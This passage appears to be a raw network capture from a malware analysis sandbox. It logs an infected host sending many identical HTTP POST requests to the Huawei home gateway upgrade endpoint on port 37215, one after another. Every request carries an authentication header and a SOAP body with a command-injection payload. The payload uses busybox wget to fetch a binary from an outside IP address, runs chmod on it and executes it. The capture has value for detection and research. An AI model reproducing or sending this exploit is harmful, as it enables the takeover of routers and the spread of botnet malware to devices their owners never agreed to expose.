                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            615192.168.2.154204041.226.70.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160067081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            616192.168.2.155047441.24.157.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160101891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            617192.168.2.155545841.25.198.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160104036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            618192.168.2.153502041.161.156.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160104036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            619192.168.2.153536841.38.183.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160104036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            620192.168.2.153981841.93.59.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160160065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            621192.168.2.154376841.106.246.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160164118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            622192.168.2.155388041.236.147.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160178900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            623192.168.2.155185841.199.219.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160196066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            624192.168.2.155705841.255.102.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160207033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
